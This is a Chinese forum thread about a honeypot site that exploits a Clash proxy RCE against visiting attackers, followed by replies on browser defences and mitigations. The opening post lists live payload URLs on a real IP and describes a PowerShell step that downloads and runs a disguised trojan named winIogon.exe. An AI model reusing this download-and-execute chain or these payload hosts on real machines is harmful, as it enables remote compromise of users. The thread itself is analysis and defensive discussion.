国护已经完成,期间朋友分享了个很骚的网站,该站的蓝队人员把 Clash RCE 运用到了实战里
RT ,访问该网站,会自动枚举 Clash 常见端口 + 4170x 端口,然后调用 Clash API 下发 yaml
Link
JavaScript
还做了系统版本判断,Victim 有 Win 有 Mac
Yaml 文件
let yaml_path = {
"win": "http://60.29.77.223:8080/05260CAD5B9562AEA0AAC8039A3AD3987E8E5E42330C39421B5F2D8D9B7880A806755F53968F788FF311B9A772",
"mac": "http://60.29.77.223:8080/385A4D8141A3E7951E5DCFF35A11387BA4B79B23970EF6954CD8F5CFF75B5E463662978C95EF1B2D2868232F60",
}
这里以 windows 为例子,会执行 Powershell Invoke-RestMehod 方法下载 exe 存到C:\Users\Public\winIogon.exe 并且执行 winIogon.exe
木马分析
微步
做了基础的一些沙箱检测,木马行为就单纯的执行 shellcode ,非注入
更深入的分析 IDA 什么的,楼主就不会了 TAT
 |
1
AEnjoyable 22 天前 via Android
我有点好奇
现在 Chrome 和 edge 对 HTTPS 站点(你给出的这个网站)请求 http ( clash API endpoint )都是默认拒绝的,能生效吗 |
 |
2
kuanat 22 天前
现在 chrome/firefox 应该都会默认阻止对 localhost 端口的非直接访问,这个第一步应该就执行不下去。
|
 |
4
lovekernel 22 天前
就是以后访问装陷阱的网站,该网站会自动进行端口扫描,然后利用 Clash RCE 下载 winIogon.exe 到本机运行?这么恐怖吗?
|
 |
5
cwxiaos 22 天前 via iPhone
好像老早就端口要求设密码了
|
 |
6
NGGTI PRO 是不是某亭的蜜罐啊,插入 js 的。
|
|
7
NGGTI PRO 这 IP 8080 端口,就是蜜罐了
|
 |
8
codehz 22 天前  1
@AEnjoyable
@kuanat 其实是这么个事,localhost/127.0.0.1 被当做安全连接了,所以不会有 mixed content 错误,本来是一个本地测试方便。。。 之前的那个 Private Network Access 在开了代理之后也会失效(不过 PNA 早就自己退役了 https://developer.chrome.com/blog/pna-on-hold?hl=zh-cn ) 以及新的对访问私有地址的限制还在草案阶段 ( https://github.com/WICG/local-network-access?tab=readme-ov-file |
 |
9
crackidz 21 天前
这个很早之前就反馈过了,官方认定就是不改
|
 |
10
restkhz 21 天前
正好最近搞了个这个: https://github.com/restkhz/CutterMCP-plus
对这个马做了一个简单静态逆向,这个马功能没那么简单。但他调试符号没有剥掉... 这马偷很多信息啊,而后从 c2 下载另一个马再执行。 |
 |
11
deepbytes 21 天前 via iPhone
cool ,最近刚要被派出去某金融机构做重保,marked ,看有没有收获
|
 |
13
doco 21 天前
点进楼主的链接会有危险吗? 刚点进去看了下那个 vue.js
|
 |
14
huangxiao123 OP @NGGTI #6 不知道是不是長亭的東西 XD
|
|
15
huangxiao123 OP @doco #13 看 JS 沒什麽問題,但是點那個站,如果你的 Clash 在漏洞範圍裏面那會 GG
|
|
16
huangxiao123 OP @cwxiaos #5 是,但是還是有人用著 Outdated 的 Shit
|
 |
17
whoami9894 21 天前
用 N-day 做蜜罐反制在几年前就是常规操作了,甚至用 0-day 的也有。很多攻击队会用一台干净新设备专门打国护,或者在虚拟机里操作,就是怕被溯源
|
 |
18
miniliuke 21 天前
不太明白,js 访问 127.0.0.1 不会触发浏览器的跨站吗?
|
 |
19
NotLongNil 21 天前
flclash 有个“外部控制器”的开关。关闭了,是否就安全了?
 |
 |
20
metalvest 21 天前 via Android
@NotLongNil mac 本来就不受影响吧
|
 |
22
sky96111 21 天前 via Android 1
@NotLongNil 是的。如果是 clash verge rev ,用新的 unix domain socket 方案也是安全的
|
 |
23
chitaotao 21 天前 via Android
ublock origin 有一个 Block Outsider Intrusion into LAN 规则,可以屏蔽对本地网络的访问; jshelter 也有屏蔽本地网络访问的选项
|
 |
24
lymanbernadette6 21 天前
emmm controller 有密码基本就没事 建议还是去掉超链接或者标记危险。。
|
|
25
NGGTI PRO @whoami9894 老操作了,几年前就那 sxf vpn 的洞来做反制。
|
 |
26
150530 21 天前
不会跨域吗?
|
|
27
kuanat 21 天前
@codehz #8 感谢解释。
我这边检查了一下,是我之前拦截了对 localhost 的访问,我还以为之前的 PNA 通过了呢。 我又回头确认了一遍,RCE 是两部分共同实现的,通过 api 控制是 POST/json ,本身是需要跨域的,但 clash 默认允许……第二个漏洞是配置项在 unmarshalling 的时候,解析的路径没有检查就直接使用,所以可以下载任意文件并执行。 |
 |
28
gksec 11 天前
几年前的东西了,国内头部蜜罐厂商的东西
|
Select Language